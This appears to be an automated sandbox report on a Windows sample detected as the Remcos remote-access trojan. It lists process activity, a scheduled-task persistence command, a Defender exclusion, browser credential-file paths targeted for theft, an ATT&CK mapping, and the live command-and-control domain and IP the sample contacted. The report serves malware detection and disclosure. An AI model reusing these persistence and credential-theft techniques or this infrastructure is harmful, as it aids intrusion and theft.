              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess created: C:\Users\user\AppData\Roaming\RTdozXra.exe "C:\Users\user\AppData\Roaming\RTdozXra.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004329DA cpuid 15_2_004329DA
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: EnumSystemLocalesW,15_2_0044F17B
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: EnumSystemLocalesW,15_2_0044F130
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: EnumSystemLocalesW,15_2_0044F216
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_0044F2A3
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: GetLocaleInfoA,15_2_0040E2BB
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: GetLocaleInfoW,15_2_0044F4F3
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_0044F61C
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: GetLocaleInfoW,15_2_0044F723
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_0044F7F0
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: EnumSystemLocalesW,15_2_00445914
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: GetLocaleInfoW,15_2_00445E1C
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_0044EEB8
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeQueries volume information: C:\Users\user\Desktop\vQyKfYxzXB.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Users\user\AppData\Roaming\RTdozXra.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040A0B0 GetLocalTime,wsprintfW,15_2_0040A0B0
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004195F8 GetUserNameW,15_2_004195F8
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_004466BF
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vQyKfYxzXB.exe PID: 7932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTR
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_0040A953
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_0040AA71
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: \key3.db15_2_0040AA71

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vQyKfYxzXB.exe PID: 7932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTR
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: cmd.exe15_2_0040567A

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		11
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		1
              Windows Service              		1
              Access Token Manipulation              		1
              Deobfuscate/Decode Files or Information              		111
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol111
              Input Capture              		2
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		1
              Windows Service              		3
              Obfuscated Files or Information              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Service Execution              		Login Hook121
              Process Injection              		2
              Software Packing              		NTDS3
              File and Directory Discovery              		Distributed Component Object ModelInput Capture1
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Scheduled Task/Job              		1
              Timestomp              		LSA Secrets33
              System Information Discovery              		SSHKeylogging11
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials121
              Security Software Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSync31
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
              Virtualization/Sandbox Evasion              		Proc Filesystem2
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation              		/etc/passwd and /etc/shadow1
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
              Process Injection              		Network Sniffing1
              System Owner/User Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587729 Sample: vQyKfYxzXB.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 44 decmainserver.webredirect.org 2->44 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 10 other signatures 2->56 8 RTdozXra.exe 5 2->8         started        11 vQyKfYxzXB.exe 7 2->11         started        signatures3 process4 file5 58 Antivirus detection for dropped file 8->58 60 Multi AV Scanner detection for dropped file 8->60 62 Contains functionalty to change the wallpaper 8->62 70 5 other signatures 8->70 14 schtasks.exe 1 8->14         started        16 RTdozXra.exe 8->16         started        36 C:\Users\user\AppData\Roaming\RTdozXra.exe, PE32 11->36 dropped 38 C:\Users\...\RTdozXra.exe:Zone.Identifier, ASCII 11->38 dropped 40 C:\Users\user\AppData\Local\...\tmp8902.tmp, XML 11->40 dropped 42 C:\Users\user\AppData\...\vQyKfYxzXB.exe.log, ASCII 11->42 dropped 64 Uses schtasks.exe or at.exe to add and modify task schedules 11->64 66 Adds a directory exclusion to Windows Defender 11->66 68 Injects a PE file into a foreign processes 11->68 18 powershell.exe 23 11->18         started        21 vQyKfYxzXB.exe 2 11->21         started        24 schtasks.exe 1 11->24         started        26 2 other processes 11->26 signatures6 process7 dnsIp8 28 conhost.exe 14->28         started        48 Loading BitLocker PowerShell Module 18->48 30 WmiPrvSE.exe 18->30         started        32 conhost.exe 18->32         started        46 decmainserver.webredirect.org 69.174.98.48, 45682, 49702, 49820 ASN-QUADRANET-GLOBALUS United States 21->46 34 conhost.exe 24->34         started        signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              vQyKfYxzXB.exe71%ReversingLabsByteCode-MSIL.Trojan.Taskun
              vQyKfYxzXB.exe100%AviraHEUR/AGEN.1306877
              vQyKfYxzXB.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\RTdozXra.exe100%AviraHEUR/AGEN.1306877
              C:\Users\user\AppData\Roaming\RTdozXra.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\RTdozXra.exe71%ReversingLabsByteCode-MSIL.Trojan.Taskun

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              decmainserver.webredirect.org0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              decmainserver.webredirect.org
              		69.174.98.48
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                decmainserver.webredirect.orgtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpRTdozXra.exefalse
                  		high
                  http://geoplugin.net/json.gp/CvQyKfYxzXB.exe, 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, vQyKfYxzXB.exe, 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, RTdozXra.exe, 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevQyKfYxzXB.exe, 00000000.00000002.1314848353.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, RTdozXra.exe, 0000000B.00000002.1379421623.0000000003101000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      69.174.98.48
                      		decmainserver.webredirect.orgUnited States
                      		8100ASN-QUADRANET-GLOBALUStrue

                      General Information

                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1587729
                      Start date and time:2025-01-10 17:29:08 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 58s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:vQyKfYxzXB.exe
                      renamed because original name is a hash value
                      Original Sample Name:0d0cc505a458e4983da79246c321dfda6edc4d9b1f14e902ac13788a27c53afa.exe
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.evad.winEXE@20/11@2/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 291
                      • Number of non-executed functions: 146
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 184.28.90.27, 172.202.163.200, 52.149.20.212
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: vQyKfYxzXB.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      11:30:07API Interceptor4286471x Sleep call for process: vQyKfYxzXB.exe modified
                      11:30:08API Interceptor17x Sleep call for process: powershell.exe modified
                      11:30:12API Interceptor1x Sleep call for process: RTdozXra.exe modified
                      17:30:09Task SchedulerRun new task: RTdozXra path: C:\Users\user\AppData\Roaming\RTdozXra.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      69.174.98.48Ref#60031796.exeGet hashmaliciousRemcosBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        decmainserver.webredirect.orgRef#60031796.exeGet hashmaliciousRemcosBrowse
                        • 69.174.98.48

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        ASN-QUADRANET-GLOBALUShttps://zfrmz.com/3GiGYUP4BArW2NBgkPU3Get hashmaliciousUnknownBrowse
                        • 45.61.152.125
                        gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                        • 66.63.187.173
                        armv5l.elfGet hashmaliciousUnknownBrowse
                        • 104.237.80.14
                        30% Order payment-BLQuote_'PO#385995790.exeGet hashmaliciousAsyncRATBrowse
                        • 69.174.100.131
                        drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                        • 66.63.187.173
                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                        • 66.63.187.122
                        drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                        • 66.63.187.173
                        drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                        • 66.63.187.173
                        file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                        • 66.63.187.173
                        Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                        • 104.223.10.34

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RTdozXra.exe.log

                        Download File
                        Process:C:\Users\user\AppData\Roaming\RTdozXra.exe
                        File Type:ASCII text, with CRLF line terminators
